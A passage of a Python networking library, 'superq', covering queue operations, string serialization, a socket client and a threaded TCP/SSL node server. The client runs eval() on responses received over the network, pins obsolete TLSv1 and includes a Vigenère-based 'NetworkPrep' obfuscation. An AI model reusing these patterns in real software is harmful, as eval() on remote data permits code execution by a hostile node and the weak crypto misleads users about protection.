returnObj\n\n # looks up elem from user object or else raises ObjectNotRecognized\n def __lookup_elem(self, obj):\n if isinstance(obj, superqelem):\n name = obj.name\n elif self.keyCol is not None:\n try:\n name = getattr(obj, self.keyCol)\n except:\n raise ObjectNotRecognized('keyCol not found')\n else:\n try:\n name = obj._superqelemKey\n except:\n raise ObjectNotRecognized('no superqelemKey')\n\n return self.__internalDict[name]\n\n def buildFromStr(self, sqStr, attach = False):\n # initialize internal storage\n self.__internalList = LinkedList()\n self.__internalDict = {}\n\n # separate out sq header from remainder\n headerSeparatorIdx = sqStr.index(';')\n sqHeader = sqStr[ : headerSeparatorIdx]\n sqStr = sqStr[headerSeparatorIdx + 1 : ]\n\n # get name and number of fields from sq header\n headerElems = sqHeader.split(',')\n self.name = headerElems[0]\n numSqes = int(headerElems[1])\n\n # separate out attributes from remainder\n headerSeparatorIdx = sqStr.index(';')\n sqAttrs = sqStr[ : headerSeparatorIdx]\n sqStr = sqStr[headerSeparatorIdx + 1 : ]\n\n # set attributes\n attrElems = sqAttrs.split(',')\n for attr in attrElems:\n name, value = attr.split('|')\n\n if value.startswith('None'):\n value = None\n\n setattr(self, name, value)\n\n if attach:\n self.attach()\n\n # parse out each superqelem\n for i in range(0, numSqes):\n # separate field length indicator from remainder\n separatorIdx = sqStr.index(',')\n elemLen = int(sqStr[ : separatorIdx])\n sqStr = sqStr[separatorIdx + 1 : ]\n\n # slice the rest 
of the sqe out\n sqeStr = sqStr[ : elemLen]\n sqStr = sqStr[elemLen : ]\n\n # deserialize sqe from string fragment\n sqe = superqelem(sqeStr, parentSq = self, buildFromStr = True)\n\n # add element to internal dictionary and tail of internal list\n self.__internalDict[sqe.name] = sqe\n self.__internalList.push_tail(sqe)\n\n def buildFromFile(self, fileName, attach = False):\n with open(fileName) as infile:\n sqHdr = infile.readline().rstrip()\n\n self.name = sqHdr\n\n sqAttrs = infile.readline().rstrip()\n\n # set attributes\n attrElems = sqAttrs.split(',')\n for attr in attrElems:\n name, value = attr.split('|')\n\n if value.startswith('None'):\n value = None\n\n setattr(self, name, value)\n\n if attach:\n self.attach()\n\n for line in infile:\n # deserialize sqe from string fragment\n sqe = superqelem(line, parentSq = self, buildFromStr = True)\n\n # add sqe to sq\n self.push(sqe)\n\n def save(self, fileName):\n with open(fileName, 'w') as f:\n sqHdr = '{0}'.format(self.name)\n f.write('{0}\\n'.format(sqHdr))\n\n # serialize relevant attributes as name-value pairs\n sqAttrs = ''\n sqAttrs += 'host|{0},'.format(self.host)\n sqAttrs += 'keyCol|{0},'.format(self.keyCol)\n sqAttrs += 'maxlen|{0},'.format(self.maxlen)\n sqAttrs += 'autoKey|{0}'.format(self.autoKey)\n\n f.write('{0}\\n'.format(sqAttrs))\n\n for sqe in self.__internalList:\n f.write('{0}\\n'.format(str(sqe)))\n\n # returns superqelems without any attempt at demarshalling\n def n(self, key):\n if key in self.__internalDict:\n return self.__internalDict[key]\n elif isinstance(key, int) and key < len(self.__internalDict):\n # if element isn't keyed on the int, try the int as an index\n return self.__internalList[key] \n else:\n raise KeyError(key)\n\n # returns internal list\n def _list(self):\n return self.__internalList\n\n # return internal list as python list\n def list(self):\n return [val for val in self]\n\n def dict(self):\n return self.__internalDict\n\n def attach(self):\n if self.attached:\n raise Exception('Already attached!')\n\n if self.dataStore.superq_exists(self.name, self.host, self.secure):\n raise NotImplementedError('Not yet allowed to attach existing superqs.')\n\n self.attached = True\n\n self.dataStore.superq_create(self, self.secure)\n\n # if attaching a locally-backed superq, back each elem\n if self.host is None or self.dataStore.public:\n # create each elem. 
The 1st one triggers backing table creation\n for sqe in self.__internalList:\n self.create_elem_datastore_only(sqe)\n\n def detach(self):\n if not self.attached:\n raise Exception('Not attached!')\n\n self.attached = False\n\n def reload(self):\n raise NotImplementedError('superq.reload()')\n\n def query(self, colLst, tableLst, conditionalStr, objSample = None):\n if not self.attached:\n raise NotImplementedError('queries not supported on detached superqs')\n\n return self.dataStore.superq_query(self,\n colLst,\n tableLst,\n conditionalStr,\n objSample,\n self.secure)\n\n def update(self):\n raise NotImplementedError('superq.update()')\n\n def delete(self):\n if self.attached:\n self.attached = False\n self.dataStore.superq_delete(self, self.secure)\n\n # inspect first sqe to determine backing table characteristics\n def __initialize_on_first_elem(self, sqe):\n self.nameStr = ''\n self.nameTypeStr = ''\n\n # scalar superqelem\n if sqe.value is not None:\n self.nameStr = '_name_,_val_,_links_'\n\n self.nameTypeStr = '_name_ TEXT,'\n if sqe.valueType.startswith('str'):\n self.nameTypeStr += '_val_ TEXT'\n elif sqe.valueType.startswith('int'):\n self.nameTypeStr += '_val_ INTEGER'\n elif sqe.valueType.startswith('float'):\n self.nameTypeStr += '_val_ REAL'\n elif sqe.valueType.startswith('byte'):\n self.nameTypeStr += '_val_ BLOB'\n\n # special _links_ column\n self.nameTypeStr += ',_links_ TEXT'\n\n self.colNames = ['_name_', '_val_', '_links_']\n self.colTypes = ['str', sqe.valueType, 'str']\n \n return\n\n colNames = []\n colTypes = []\n\n # support autoKey\n if self.keyCol is None:\n self.nameStr = '_name_,'\n self.nameTypeStr = '_name_ TEXT,'\n colNames = ['_name_']\n colTypes = ['str']\n\n # non-scalar superqelem\n for atom in sqe:\n if atom.type.startswith('str'):\n self.nameTypeStr += '{0} TEXT,'.format(atom.name)\n elif atom.type.startswith('int'):\n self.nameTypeStr += '{0} INTEGER,'.format(atom.name)\n elif atom.type.startswith('float'):\n self.nameTypeStr += '{0} REAL,'.format(atom.name)\n elif atom.type.startswith('byte'):\n self.nameTypeStr += '{0} BLOB,'.format(atom.name)\n else:\n raise TypeError('Unsupported type {0}'.format(atom.type))\n\n colTypes.append(atom.type)\n\n # add column name to list of names and name string\n colNames.append(atom.name)\n self.nameStr += '{0},'.format(atom.name)\n\n # strip trailing commas\n self.nameStr = self.nameStr.rstrip(',')\n self.nameTypeStr = self.nameTypeStr.rstrip(',')\n\n # append special _links_ column info\n self.nameStr += ',_links_'\n self.nameTypeStr += ',_links_ TEXT'\n colNames.append('_links_')\n colTypes.append('str')\n\n self.colNames = colNames\n self.colTypes = colTypes\n\n def create_elem_datastore_only(self, sqe, idx = None):\n # enable sqe to trigger datastore updates through parent sq\n sqe.parentSq = self\n\n # build understanding of backing table the 1st time through\n if not self.colNames:\n # build understanding of object structure\n self.__initialize_on_first_elem(sqe)\n\n # set flag to create table if non-hosted or dataStore is public\n if self.host is None or self.dataStore.public:\n self.createTable = True\n\n if self.attached:\n self.dataStore.superqelem_create(self,\n sqe,\n idx,\n self.createTable,\n self.secure)\n\n if self.createTable:\n self.createTable = False\n\n def create_elem(self, value, name = None, idx = None):\n return self.push(self.__wrap_elem(value, name), idx)\n\n def read_elem(self, key = None, idx = None):\n if key is not None:\n return self[key]\n elif idx is not None:\n return self.__internalList[idx]\n 
else:\n # efficiently return random element without list traversal\n keys = list(self.__internalDict.keys())\n return self.__internalDict[keys[random.randrange(0, len(keys))]]\n\n # exists for sqe.__setProperty() to update datastore without recursing\n def update_elem_datastore_only(self, sqe):\n if self.attached:\n self.dataStore.superqelem_update(self, sqe, self.secure)\n\n def update_elem(self, value):\n if isinstance(value, superqelem):\n sqe = value\n\n # if sqe is not attached\n if sqe.parentSq is None:\n # lookup attached sqe\n attachedSqe = self.__internalDict[sqe.name]\n\n # handle scalars\n attachedSqe.set_scalar(sqe.value)\n\n # demarshal from detached sqe to attached\n for atom in attachedSqe:\n atom.value = sqe[atom.name]\n\n # rebuild links\n attachedSqe.resetLinks()\n attachedSqe.addLinksFromStr(sqe.links)\n\n sqe = attachedSqe\n else:\n # lookup attached sqe from user object\n sqe = self.__lookup_elem(value)\n \n # marshal from user object to sqe\n for atom in sqe:\n atom.value = getattr(value, atom.name)\n\n # update attached sqe\n self.update_elem_datastore_only(sqe)\n\n def delete_elem_datastore_only(self, sqe):\n if self.attached:\n self.dataStore.superqelem_delete(self, sqe.name, self.secure)\n\n def delete_elem(self, value):\n if isinstance(value, superqelem):\n sqe = value\n elif isinstance(value, (str, int, float)) and \\\n value in self.__internalDict:\n sqe = self.__internalDict[value]\n elif isinstance(value, int) and value < len(self.__internalDict):\n sqe = self.__internalList[value]\n else:\n # lookup sqe from user object\n sqe = self.__lookup_elem(value)\n\n with self.not_empty:\n # remove element from internal collections\n self.__internalDict.pop(sqe.name)\n self.__internalList.pop_node(sqe)\n\n self.delete_elem_datastore_only(sqe)\n\n self.not_full.notify()\n\n # these thread-safe methods can be used for synchronized superq access\n\n# TODO: does it make sense to add more aliases to match for instance standard\n# list functions. 
Or to change the existing names?\n\n def push(self, value, idx = None, block = True, timeout = None):\n with self.not_full:\n # handle dropping an element if needed\n if self.maxlen is not None and len(self) > self.maxlen:\n if block:\n if timeout is None:\n while len(self) >= self.maxlen:\n self.not_full.wait()\n elif timeout < 0:\n raise ValueError('timeout must be non-negative')\n else:\n endtime = time() + timeout\n while len(self) >= self.maxlen:\n remaining = endtime - time()\n if remaining <= 0.0:\n raise SuperQFull('superq is full')\n self.not_full.wait(remaining)\n else:\n if self.maxlen < 0:\n raise ValueError('maxlen is negative')\n return\n elif self.maxlen is not None and len(self) == self.maxlen:\n if idx is None or idx >= len(self) - 1:\n self.pop_head()\n elif idx <= 0:\n self.pop_tail()\n else:\n raise ValueError('Cannot insert into full set')\n\n # convert value to sqe if necessary\n sqe = self.__wrap_elem(value)\n\n # add sqe to internal dictionary\n self.__internalDict[sqe.name] = sqe\n\n # add sqe to internal list\n if idx is None or idx >= len(self) - 1:\n # default to stack/LIFO behavior\n self.__internalList.push_tail(sqe)\n elif idx == 0:\n self.__internalList.push_head(sqe)\n else:\n self.__internalList.push(idx, sqe)\n\n # for now pushes on hosted superqs are slow due to blocking here\n if self.attached:\n self.create_elem_datastore_only(sqe, idx)\n\n self.not_empty.notify()\n\n # return the object for elegant create_elem()\n return sqe\n\n def push_head(self, value, block = True, timeout = None):\n return self.push(value, 0, block, timeout)\n\n def push_tail(self, value, block = True, timeout = None):\n return self.push(value, len(self), block, timeout)\n\n def pop(self, idx = None, block = True, timeout = None):\n with self.not_empty:\n if not block:\n if len(self) == 0:\n raise SuperQEmpty('no elements in superq')\n elif timeout is None:\n while len(self) == 0:\n self.not_empty.wait()\n elif timeout < 0:\n raise ValueError('timeout must be non-negative')\n else:\n endtime = time() + timeout\n while len(self) == 0:\n remaining = endtime - time()\n if remaining <= 0.0:\n raise SuperQEmpty\n self.not_empty.wait(remaining)\n\n # default to stack/LIFO behavior\n if idx is None:\n idx = len(self) - 1\n\n # remove element from internal collections\n sqe = self.__internalList.pop(idx)\n self.__internalDict.pop(sqe.name)\n\n # for now pops on hosted superqs are slow due to blocking here\n if self.attached:\n self.delete_elem_datastore_only(sqe)\n\n self.not_full.notify()\n\n return self.__unwrap_elem(sqe)\n\n def pop_head(self, block = True, timeout = None):\n return self.pop(0, block, timeout)\n\n def pop_tail(self, block = True, timeout = None):\n return self.pop(len(self) - 1, block, timeout)\n\n # rotate superqelems n steps to the right. 
If n is negative, rotates left\n def rotate(self, n):\n # rotate one element at a time in the indicated direction\n if n >= 0:\n for i in range(0, n):\n self.push_head(self.pop_tail())\n else:\n for i in range(0, abs(n)):\n self.push_tail(self.pop_head())\n\n # waits for superq to be empty\n def join(self):\n raise NotImplementedError('superq.join()')\n\n# create public network node instance or private instance for program\n_dataStore = SuperQDataStore()\n\n_nodeRequestNextId = 1\n_nodeRequestLock = Lock()\nclass SuperQNodeRequest():\n def __init__(self, msg_id_ = '', cmd_ = 0, args_ = '', body_ = ''):\n self.msg_id = msg_id_\n self.cmd = cmd_\n self.args = args_\n self.body = body_\n\n if self.msg_id == '':\n self.__set_msg_id()\n\n def __set_msg_id(self):\n global _nodeRequestNextId\n global _nodeRequestLock\n\n _nodeRequestLock.acquire()\n self.msg_id = str(_nodeRequestNextId)\n _nodeRequestNextId += 1\n _nodeRequestLock.release()\n\n def __str__(self):\n return '{0}|{1}|{2}%{3}'.format(self.msg_id,\n self.cmd,\n self.args,\n self.body)\n\n def from_str(self, requestStr):\n try: \n headerSeparatorIdx = requestStr.index('%')\n\n # separate out cmd header and body\n cmdHeader = requestStr[ : headerSeparatorIdx]\n body = requestStr[headerSeparatorIdx + 1 : ]\n\n elems = cmdHeader.split('|')\n\n if len(elems) != 3:\n raise MalformedNetworkRequest(requestStr)\n\n self.msg_id = elems[0]\n self.cmd = SQNodeCmd(int(elems[1]))\n self.args = elems[2]\n self.body = body\n except Exception as e:\n exceptStr = 'Request: {0}\\nException: {1}'.format(requestStr, e)\n raise MalformedNetworkRequest(exceptStr)\n\nclass SuperQNodeResponse():\n def __init__(self, msg_id_ = '', result_ = '', body_ = ''):\n self.msg_id = msg_id_\n self.result = result_\n self.body = body_\n\n def __str__(self):\n return '{0}|{1}%{2}'.format(self.msg_id,\n self.result,\n self.body)\n\n def from_str(self, responseStr):\n try:\n headerSeparatorIdx = responseStr.index('%')\n \n # separate out cmd header and body\n responseHeader = responseStr[ : headerSeparatorIdx]\n responseBody = responseStr[headerSeparatorIdx + 1 : ]\n\n elems = responseHeader.split('|')\n\n if len(elems) != 2:\n raise MalformedNetworkResponse(responseStr)\n\n self.msg_id = elems[0]\n self.result = elems[1]\n self.body = responseBody\n except Exception as e:\n exceptStr = 'Response: {0}\\nException: {1}'.format(responseStr, e)\n raise MalformedNetworkResponse(exceptStr)\n\n# vigenere\nfrom base64 import urlsafe_b64encode, urlsafe_b64decode\nclass NetworkPrep():\n @staticmethod\n def prep(key, clear):\n enc = []\n for i in range(len(clear)):\n key_c = key[i % len(key)]\n enc_c = chr((ord(clear[i]) + ord(key_c)) % 256)\n enc.append(enc_c)\n # code points stay below 256, so latin-1 maps them 1:1 onto bytes\n return urlsafe_b64encode(\"\".join(enc).encode('latin-1'))\n\n @staticmethod\n def deprep(key, enc):\n dec = []\n enc = urlsafe_b64decode(enc)\n for i in range(len(enc)):\n key_c = key[i % len(key)]\n # b64decode yields bytes, so enc[i] is already an int\n dec_c = chr((256 + enc[i] - ord(key_c)) % 256)\n dec.append(dec_c)\n return \"\".join(dec)\n\n# manages network connections and requests to network nodes\nclass SuperQNetworkClientMgr():\n def __init__(self):\n # client is currently responsible for starting up network node\n self.__nodeProcess = None\n\n self.__nodeProcessLock = Lock()\n\n # dictionary of superq-based socket pools keyed by (host, port)\n self.__socketPoolDict = {}\n\n def __start_networked_datastore(self):\n # start superq local network node\n with self.__nodeProcessLock:\n if self.__nodeProcess is not None:\n return\n\n nodeArgs = ['python3',\n 'superq.py',\n '-t',\n str(DEFAULT_TCP_PORT),\n '-s',\n 
str(DEFAULT_SSL_PORT)]\n\n if WIN32_POPEN_FLAGS is not None:\n self.__nodeProcess = Popen(nodeArgs,\n creationflags = WIN32_POPEN_FLAGS)\n else:\n self.__nodeProcess = Popen(nodeArgs)\n\n with open('node.pid', 'w') as f:\n f.write(str(self.__nodeProcess.pid))\n\n def shutdown(self):\n if self.__nodeProcess is not None:\n kill(self.__nodeProcess.pid, 9)\n\n # cleanup socket pools\n for key, socketPool in self.__socketPoolDict.items():\n while True:\n try:\n s = socketPool.pop(block = False)\n except SuperQEmpty:\n break\n else:\n s.close()\n\n def __new_socket(self,\n host = 'localhost',\n port = DEFAULT_TCP_PORT,\n ssl = False):\n s = socket(AF_INET, SOCK_STREAM)\n\n # convert socket to ssl if requested\n if ssl:\n s = wrap_socket(s,\n ca_certs = DEFAULT_SSL_PEM_FILE,\n cert_reqs = CERT_REQUIRED,\n ssl_version = PROTOCOL_TLSv1)\n\n try:\n s.connect((host, port))\n return s\n except ConnectionRefusedError:\n # start localhost datastore\n if host == 'localhost' and port == DEFAULT_TCP_PORT:\n self.__start_networked_datastore()\n\n # attempt to connect to datastore once it is started\n attempts = 0\n maxAttempts = 5\n while attempts < maxAttempts:\n try:\n s.connect((host, port))\n return s\n except:\n sleep(.2)\n attempts += 1\n\n raise\n\n def __get_socket(self, host, port, ssl = False): \n # get or initialize socket pool specific to host and port\n try:\n socketPool = self.__socketPoolDict[(host, port)] \n except KeyError:\n # create detached superq to use for socket pool\n socketPool = superq([])\n self.__socketPoolDict[(host, port)] = socketPool\n\n # get existing socket if available or open new one\n try:\n s = socketPool.pop(block = False)\n except SuperQEmpty:\n return self.__new_socket(host, port, ssl)\n\n return s\n\n def __return_socket(self,\n s,\n host = 'localhost',\n port = DEFAULT_TCP_PORT):\n # return socket to appropriate socket pool\n self.__socketPoolDict[(host, port)].push(s)\n\n def __send(self, s, msg):\n buffer = msg\n \n totalSent = 0\n while totalSent < len(buffer):\n bytesSent = s.send(buffer[totalSent:])\n if bytesSent == 0:\n raise RuntimeError('Connection closed.')\n totalSent = totalSent + bytesSent\n\n def __recv(self, s, bytesToRecv):\n buffer = bytearray()\n\n while len(buffer) < bytesToRecv:\n tempBuf = s.recv(bytesToRecv - len(buffer))\n if len(tempBuf) == 0:\n raise RuntimeError('Connection closed.')\n buffer += tempBuf\n \n return buffer\n\n def __get_msg(self, s):\n # first 4 bytes contain message body length\n data = bytearray()\n while len(data) < 4:\n currentData = self.__recv(s, 4 - len(data))\n\n if len(currentData) == 0:\n raise Exception('0 bytes read. 
Connection probably closed.')\n\n data += currentData\n\n # convert length\n messageLength = unpack('I', data)[0]\n\n # now read the rest of the message\n data = bytearray()\n while len(data) < messageLength:\n currentData = self.__recv(s, messageLength - len(data))\n\n if len(currentData) == 0:\n raise RuntimeError('Connection closed.')\n\n data += currentData\n\n # decode character data\n msg = data.decode('utf-8')\n\n # build response object from string\n response = SuperQNodeResponse()\n response.from_str(msg)\n\n return response\n\n def __send_msg(self, host, strMsg, secure = False):\n ssl = False\n\n # 'local' is shorthand for localhost:DEFAULT_PORT\n if host == 'local':\n host = 'localhost'\n port = DEFAULT_TCP_PORT\n else:\n if host.startswith('ssl:'):\n ssl, host, port = host.split(':')\n ssl = True\n port = int(port)\n else:\n try:\n host, port = host.split(':')\n port = int(port)\n except ValueError:\n port = DEFAULT_TCP_PORT\n\n msg = bytearray()\n msg.extend(pack('I', len(strMsg)))\n msg.extend(strMsg.encode('utf-8'))\n\n # get existing socket from socket pool or initialize new one\n s = self.__get_socket(host, port, ssl)\n\n # send message\n self.__send(s, msg)\n\n # get response\n response = self.__get_msg(s)\n\n # return socket to thread pool\n self.__return_socket(s, host, port)\n\n return response\n\n # this might be used in the case of create_elem for instance, to provide\n # a non-blocking operation. But it requires some kind of transactional\n # implementation or solution to prevent synchronization errors\n def __send_msg_async(self, host, strMsg, secure = False):\n t = Thread(target = self.__send_msg, args = (host, strMsg))\n t.start()\n\n def superq_exists(self, name, host, secure = False):\n # build request object from string\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superq_exists.value\n request.args = name\n\n response = self.__send_msg(host, str(request), secure)\n\n return eval(response.result)\n\n def superq_create(self, sq, secure = False):\n # build request object from string\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superq_create.value\n request.args = sq.publicName\n request.body = str(sq)\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superq_create(): {0}'.format(response))\n\n def superq_read(self, name, host, secure = False):\n # build request object from string\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superq_read.value\n request.args = name\n\n response = self.__send_msg(host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superq_read(): {0}'.format(response))\n\n # deserialize response body into a detached superq\n sq = superq(response.body, attach = False, buildFromStr = True)\n\n return sq\n\n def superq_delete(self, sq, secure = False):\n # build request object\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superq_delete.value\n request.args = sq.publicName\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superq_delete(): {0}'.format(response))\n\n def superq_query(self, sq, queryStr, secure = False):\n # build request object from string\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superq_query.value\n request.args = sq.publicName\n request.body = queryStr\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if eval(response.result):\n return superq(response.body, attach = False, buildFromStr = True)\n 
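# a non-True result means the node reported failure; surface the response\n 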
else:\n raise SuperQEx('superq_query(): {0}'.format(response))\n\n def superqelem_create(self, sq, sqe, idx = None, secure = False):\n # build request object\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superqelem_create.value\n request.args = '{0},{1}'.format(sq.publicName, idx)\n request.body = str(sqe)\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superqelem_create(): {0}'.format(str(response)))\n\n def superqelem_update(self, sq, sqe, secure = False):\n # build request object\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superqelem_update.value\n request.args = '{0}'.format(sq.publicName)\n request.body = str(sqe)\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superqelem_update(): {0}'.format(str(response)))\n\n def superqelem_delete(self, sq, sqeName, secure = False):\n # build request object\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superqelem_delete.value\n request.args = '{0}'.format(sq.publicName)\n request.body = '{0}'.format(sqeName)\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superqelem_delete(): {0}'.format(str(response)))\n\n# deserializes requests, processes them, and serializes responses\nclass SuperQStreamHandler(StreamRequestHandler):\n def handle(self): \n # client can stay connected for multiple Request-Response transactions\n while True:\n try:\n self.handle_connection()\n except Exception as e:\n tb = format_exc()\n self.raise_error('Exception: {0}\\nTrace: {1}'.format(e, tb))\n self.request.close()\n\n def raise_error(self, msg):\n with open('node.output', 'a') as f:\n f.write('\\n' + msg)\n\n raise RuntimeError(msg)\n\n def return_response(self, response):\n strResponse = str(response)\n msg = bytearray()\n \n msg.extend(pack('I', len(strResponse)))\n msg.extend(strResponse.encode('utf-8'))\n\n self.wfile.write(msg)\n\n def handle_connection(self):\n # first 4 bytes contain message body length\n data = bytearray()\n try:\n while len(data) < 4:\n currentData = self.connection.recv(4 - len(data))\n\n if len(currentData) == 0:\n self.raise_error('connection closed while reading length')\n\n data += currentData\n except Exception as e:\n self.raise_error(str(e))\n raise\n\n # convert length\n messageLength = unpack('I', data)[0]\n\n # now read the rest of the message\n data = bytearray()\n while len(data) < messageLength:\n currentData = self.connection.recv(messageLength - len(data))\n\n if len(currentData) == 0:\n self.raise_error('connection closed during read')\n\n data += currentData\n\n # decode character data\n msg = data.decode('utf-8')\n\n # build request object from string\n request = SuperQNodeRequest()\n request.from_str(msg)\n\n # start building response\n response = SuperQNodeResponse()\n response.msg_id = request.msg_id\n response.result = str(False)\n\n cmd = request.cmd\n args = request.args\n body = request.body\n\n if cmd == SQNodeCmd.superq_exists:\n response.result = str(_dataStore.superq_exists(args))\n response.body = ''\n elif cmd == SQNodeCmd.superq_create:\n if _dataStore.superq_exists(args):\n response.result = str(False)\n else:\n # deserialize request body into a detached superq\n sq = superq(body, attach = False, buildFromStr = True)\n\n # assign superq to the node datastore\n sq.attach()\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superq_read:\n sq = _dataStore.superq_read(args)\n\n 
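# serialize the superq into the response body; the client rebuilds it with buildFromStr\n 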
response.body = str(sq)\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superq_delete:\n try:\n sq = _dataStore.superq_read(args)\n except:\n raise KeyError('superq {0} does not exist'.format(args))\n\n _dataStore.superq_delete(sq)\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superq_query:\n try:\n sq = _dataStore.superq_read(args)\n except:\n raise KeyError('superq {0} does not exist'.format(args))\n\n # store resulting superq in response body\n response.body = str(_dataStore.superq_query_local(body))\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superqelem_exists:\n pass\n elif cmd == SQNodeCmd.superqelem_create:\n sqName, sqeIdx = args.split(',')\n\n try:\n sqeIdx = int(sqeIdx)\n except ValueError:\n sqeIdx = None\n\n try:\n sq = _dataStore.superq_read(sqName)\n except KeyError:\n raise KeyError('superq {0} does not exist'.format(sqName))\n\n # build sqe from request\n sqe = superqelem(body, buildFromStr = True)\n\n sq.create_elem(sqe, idx = sqeIdx)\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superqelem_read:\n pass\n elif cmd == SQNodeCmd.superqelem_update:\n sqName = args\n\n try:\n sq = _dataStore.superq_read(sqName)\n except KeyError:\n raise KeyError('superq {0} does not exist'.format(sqName))\n\n # build sqe from request\n sqe = superqelem(body, buildFromStr = True)\n\n sq.update_elem(sqe)\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superqelem_delete:\n sqName = args\n sqeName = body\n\n try:\n sq = _dataStore.superq_read(sqName)\n except KeyError:\n raise KeyError('superq {0} does not exist'.format(sqName))\n\n sq.delete_elem(sqeName)\n\n response.result = str(True)\n else:\n raise MalformedNetworkRequest(msg)\n\n self.return_response(response)\n \nclass SuperQTCPServer(TCPServer):\n def __init__(self,\n server_address,\n RequestHandlerClass,\n bind_and_activate = True):\n TCPServer.__init__(self,\n server_address,\n RequestHandlerClass,\n bind_and_activate)\n\n def get_request(self):\n newsocket, fromaddr = self.socket.accept()\n\n return newsocket, fromaddr\n\nclass SuperQTCPThreadedServer(ThreadingMixIn, SuperQTCPServer): pass\n\nclass SuperQSSLServer(TCPServer):\n def __init__(self,\n server_address,\n RequestHandlerClass,\n certfile,\n keyfile,\n ssl_version = PROTOCOL_TLSv1,\n bind_and_activate = True):\n TCPServer.__init__(self,\n server_address,\n RequestHandlerClass,\n bind_and_activate)\n self.certfile = certfile\n self.keyfile = keyfile\n self.ssl_version = ssl_version\n\n def get_request(self):\n newsocket, fromaddr = self.socket.accept()\n\n connstream = ssl.wrap_socket(newsocket,\n server_side = True,\n certfile = self.certfile,\n keyfile = self.keyfile,\n ssl_version = self.ssl_version)\n \n return connstream, fromaddr\n\nclass SuperQSSLThreadedServer(ThreadingMixIn, SuperQSSLServer): pass\n\n# provides local and remote network interfaces for networked data store\nclass SuperQNetworkNode():\n def __init__(self):\n self.__tcpServer = None\n self.__sslServer = None\n\n self.__tcpThread = None\n self.__sslThread = None\n\n def launch_tcp_server(self, host, port):\n # create localhost TCP server on the given port\n self.__tcpServer = SuperQTCPThreadedServer((host, port),\n SuperQStreamHandler)\n\n # handle requests until an explicit shutdown() request\n self.__tcpServer.serve_forever()\n\n def shutdown_tcp_server(self):\n self.__tcpServer.shutdown()\n self.__tcpThread.join()\n\n self.__tcpServer = None\n self.__tcpThread = None\n\n def launch_ssl_server(self, host, port):\n # create localhost SSL server on the given 
port\n self.__sslServer = SuperQSSLThreadedServer((host, port),\n SuperQStreamHandler,\n DEFAULT_SSL_PEM_FILE,\n DEFAULT_SSL_KEY_FILE,\n ssl_version = PROTOCOL_TLSv1)\n\n # handle requests until an explicit shutdown() request\n self.__sslServer.serve_forever()\n\n def shutdown_ssl_server(self):\n self.__sslServer.shutdown()\n self.__sslThread.join()\n\n self.__sslServer = None\n self.__sslThread = None\n\n def launch_node_mgr(self, tcpPort, sslPort, startSSL):\n log('Starting TCP connection handler ...')\n self.__tcpThread = Thread(target = self.launch_tcp_server,\n args = ('', tcpPort))\n self.__tcpThread.start()\n\n if startSSL:\n log('Starting SSL connection handler ...')\n self.__sslThread = Thread(target = self.launch_ssl_server,\n args = ('', sslPort))\n self.__sslThread.start()\n\n def shutdown_node(self):\n if self.__tcpServer:\n self.shutdown_tcp_server()\n\n if self.__sslServer:\n self.shutdown_ssl_server()\n\ndef main(argv):\n log('Starting superq public node ...')\n\n tcpPort = DEFAULT_TCP_PORT\n sslPort = DEFAULT_SSL_PORT\n\n sslEnabled = False\n\n try:\n opts, args = getopt(argv, 't:s:', ['tcpport=', 'sslport='])\n except GetoptError:\n exit(2)\n\n for opt, arg in opts:\n if opt in ('-t', '--tcpport'):\n tcpPort = arg\n elif opt in ('-s', '--sslport'):\n sslEnabled = True\n sslPort = arg\n\n log('TCP port is {0}'.format(tcpPort))\n\n if (sslEnabled):\n log('SSL port is {0}. '.format(sslPort))\n\n log('Setting internal datastore to public ...')\n _dataStore.set_public()\n\n log('Creating and launching node ...')\n nodeMgr = SuperQNetworkNode()\n nodeMgr.launch_node_mgr(int(tcpPort), int(sslPort), sslEnabled)\n\n log('Cleaning up ...')\n nodeMgr.shutdown_node()\n\n log('Leaving main.')\n\nif __name__ == '__main__':\n main(argv[1:])\n\n# TODO: FEATURES:\n#\n# 1) encryption\n# 2) persistence\n# 3) alteration\n# 4) testing\n# 5) documentation\n\n# 1) I'm only concerned with encryption over the network. Assume individual\n# node system security is handled on an operating system administrative\n# level. Incidentally this makes the problem of querying on an encrypted db\n# go away.\n# Considering currently pulling the ssl implementation out so that security\n# can be cleanly revisited down the road.\n\n# 2) I like maintaining the current datastore-based save/restore. Could be\n# useful for migrating datastores between physical nodes. Or possibly\n# mirroring. It can be treated entirely separately from instance persistence.\n# Instance persistence should be handled simply with a boolean setting that\n# can be passed to the constructor on superq creation or changed dynamically\n# any time after.\n\n# 3) Need to support: add column, remove column, rename column, rename table\n\n# 4) Mainly interested in a performance test suite that can detect scalability\n# issues as well as further synchronization/parallel testing.\n\n# 5) Improve existing architectural and api documentation. 
